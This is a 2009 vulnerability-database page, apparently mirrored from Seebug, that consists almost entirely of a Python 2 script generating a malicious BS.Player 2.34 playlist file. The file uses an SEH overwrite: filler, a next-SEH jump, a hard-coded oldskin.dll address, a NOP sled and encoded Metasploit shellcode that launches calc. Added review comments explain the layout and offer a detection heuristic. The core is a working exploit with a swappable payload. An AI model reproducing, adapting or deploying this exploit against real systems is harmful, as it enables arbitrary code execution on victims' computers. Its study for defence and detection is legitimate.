BS.Player 2.34 (.bsl) Universal SEH Overwrite Exploit

2009-03-23T00:00:00
ID SSV:10858
Type seebug
Reporter Root
Modified 2009-03-23T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #usage: exploit.py
# Proof-of-concept file generator, written with Python 2 print statements.
# It concatenates several byte strings and writes the result to "exploit.bsl".
# Per the page title, the target is BS.Player 2.34's handling of .bsl files and
# the technique is an SEH (structured exception handler) overwrite.
# NOTE(review): quotes and backslashes in this listing are escaped (\" and \\x),
# presumably an extraction artifact; as shown, the text is not valid Python.

# Banner output only; none of these lines affect the generated file.
print \"**************************************************************************\"
print \" Bs.Player 2.34 (.bsl) Universal Seh Overwrite Exploit\\n\"
print \" Author : Nine:Situations:Group::pyrokinesis\"
print \" Exploited by : His0k4\"
print \" Tested on: Windows XP Pro SP2 Fr\\n\"
print \" Greetings to:\"
print \" All friends & muslims HaCkers(dz)\\n\"
print \"**************************************************************************\"
         	
			
# 412 bytes of 0x41 ('A') filler, placed between header1 and the two 4-byte
# fields below.
# NOTE(review): presumably the distance from the start of the overflowed buffer
# to the SEH record on the stack; this page does not show how 412 was derived.
buff = \"\\x41\" * 412

# 4 bytes: 0xEB 0x12 encodes an x86 short jump (+0x12), followed by two 0x41
# pad bytes. The variable name indicates this lands on the "next SEH" pointer.
next_seh = \"\\xEB\\x12\\x41\\x41\"

# 4 bytes, little-endian 0x025826D0. The original comment attributes this
# address to oldskin.dll.
# NOTE(review): a hard-coded in-module address only holds if that module loads
# at a fixed base and is not covered by SafeSEH / SEHOP / ASLR; presumably true
# on the tested XP SP2 system. Confirm against the installed build when
# assessing exposure.
seh = \"\\xD0\\x26\\x58\\x02\" # oldskin.dll

# 19 bytes of 0x90 (x86 NOP) between the pointer fields and the payload.
nops = \"\\x90\"*19

# header1 decodes to ASCII "http://Raw-High." and header2 to ".FM/listen.pls"
# followed by 0x0A 0x00, so the crafted bytes sit inside what looks like one
# URL entry of the playlist.
# Detection note: a .bsl entry whose URL runs to several hundred bytes, or that
# contains non-printable bytes such as 0x90 / 0xEB, is not a legitimate
# playlist line and can be flagged before the file reaches the player.
header1= \"\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x52\\x61\\x77\\x2D\\x48\\x69\\x67\\x68\\x2E\"
header2= \"\\x2E\\x46\\x4D\\x2F\\x6C\\x69\\x73\\x74\\x65\\x6E\\x2E\\x70\\x6C\\x73\\x0A\\x00\"

# Payload. According to the generator comment below, this is a Metasploit
# win32_exec payload with CMD=calc (it starts the Windows calculator as a
# visible proof of code execution), encoded with PexAlphaNum. The literal is
# 343 bytes long, which matches the stated Size.
# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"
\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"
\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"
\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"
\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34\"
\"\\x42\\x50\\x42\\x30\\x42\\x30\\x4b\\x58\\x45\\x34\\x4e\\x33\\x4b\\x58\\x4e\\x37\"
\"\\x45\\x30\\x4a\\x37\\x41\\x30\\x4f\\x4e\\x4b\\x48\\x4f\\x54\\x4a\\x51\\x4b\\x58\"
\"\\x4f\\x55\\x42\\x42\\x41\\x50\\x4b\\x4e\\x49\\x34\\x4b\\x58\\x46\\x33\\x4b\\x48\"
\"\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x49\\x4e\\x4a\\x46\\x58\\x42\\x4c\"
\"\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\\x44\\x4c\\x4b\\x4e\"
\"\\x46\\x4f\\x4b\\x33\\x46\\x55\\x46\\x52\\x46\\x50\\x45\\x37\\x45\\x4e\\x4b\\x58\"
\"\\x4f\\x45\\x46\\x42\\x41\\x30\\x4b\\x4e\\x48\\x56\\x4b\\x38\\x4e\\x30\\x4b\\x34\"
\"\\x4b\\x58\\x4f\\x35\\x4e\\x31\\x41\\x30\\x4b\\x4e\\x4b\\x38\\x4e\\x41\\x4b\\x58\"
\"\\x41\\x50\\x4b\\x4e\\x49\\x48\\x4e\\x45\\x46\\x52\\x46\\x50\\x43\\x4c\\x41\\x53\"
\"\\x42\\x4c\\x46\\x56\\x4b\\x58\\x42\\x54\\x42\\x53\\x45\\x48\\x42\\x4c\\x4a\\x57\"
\"\\x4e\\x50\\x4b\\x58\\x42\\x54\\x4e\\x30\\x4b\\x38\\x42\\x57\\x4e\\x41\\x4d\\x4a\"
\"\\x4b\\x38\\x4a\\x46\\x4a\\x50\\x4b\\x4e\\x49\\x30\\x4b\\x38\\x42\\x48\\x42\\x4b\"
\"\\x42\\x50\\x42\\x50\\x42\\x50\\x4b\\x58\\x4a\\x46\\x4e\\x53\\x4f\\x35\\x41\\x33\"
\"\\x48\\x4f\\x42\\x46\\x48\\x35\\x49\\x38\\x4a\\x4f\\x43\\x58\\x42\\x4c\\x4b\\x57\"
\"\\x42\\x35\\x4a\\x36\\x42\\x4f\\x4c\\x58\\x46\\x50\\x4f\\x45\\x4a\\x46\\x4a\\x49\"
\"\\x50\\x4f\\x4c\\x48\\x50\\x30\\x47\\x45\\x4f\\x4f\\x47\\x4e\\x43\\x56\\x41\\x56\"
\"\\x4e\\x46\\x43\\x46\\x42\\x30\\x5a\")

	
# Final layout, in order: header1 | filler | next_seh | seh | nops | shellcode
# | header2, i.e. 16 + 412 + 4 + 4 + 19 + 343 + 16 = 814 bytes.
exploit = header1 + buff + next_seh + seh + nops + shellcode + header2

# Write the assembled bytes to exploit.bsl in the current working directory.
# The bare except hides the cause of any failure (and any other exception
# raised in the block) behind a generic "Error" message.
try:
    out_file = open(\"exploit.bsl\",\'w\')
    out_file.write(exploit)
    out_file.close()
    print \"Exploit file created!\\n\"
except:
    print \"Error\"